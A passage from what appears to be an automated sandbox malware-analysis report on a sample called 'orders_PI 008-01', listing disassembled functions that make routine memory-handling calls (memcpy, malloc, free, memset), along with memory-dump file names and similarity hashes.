                                        • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                        • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                        Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                        • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                        • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID:
                                        • API String ID: 3510742995-0
                                        • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                        • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                        • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                        • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                        Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                        • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                        • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                        • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                        Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 0040797A
                                        • free.MSVCRT ref: 0040799A
                                          • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                          • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                          • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                        • free.MSVCRT ref: 004079BD
                                        • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocstrlen
                                        • String ID:
                                        • API String ID: 3669619086-0
                                        • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                        • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                        • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                        • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59